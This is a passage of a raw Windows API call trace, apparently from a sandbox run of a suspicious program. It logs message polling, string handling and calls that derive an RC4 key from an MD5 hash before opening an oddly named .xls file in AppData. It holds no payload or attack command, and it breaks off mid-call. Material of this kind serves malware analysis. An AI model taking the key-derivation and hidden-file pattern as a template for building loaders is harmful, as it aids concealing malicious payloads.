lpMsg=0x8cf4a8) returned 0 [0150.846] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.846] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.846] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0150.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0150.846] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.846] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.846] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.846] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.846] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.846] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0150.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0150.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0150.847] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beef0) returned 1 [0150.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.848] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.848] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.848] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0150.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.848] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0150.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.849] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.849] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.849] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.849] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.849] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.849] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.850] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.850] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.850] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.850] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0150.850] CryptCreateHash (in: hProv=0x9beef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0150.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.851] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0150.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.851] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.851] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0150.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0150.851] CryptHashData (hHash=0x9e1d38, pbData=0x2a72648, dwDataLen=0x3, dwFlags=0x1) returned 1 [0150.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.851] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.851] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.851] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.851] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.852] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.852] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.852] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0150.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa3c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0150.852] CryptDeriveKey (in: hProv=0x9beef0, Algid=0x6601, hBaseData=0x9e1d38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0150.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.852] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.852] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0150.852] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.852] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0150.852] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0150.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0150.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0150.853] CryptDestroyHash (hHash=0x9e1d38) returned 1 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0150.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.854] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/sn-hlisepFoxRII.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sn-hlisepfoxrii.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0150.854] SetFilePointerEx (in: 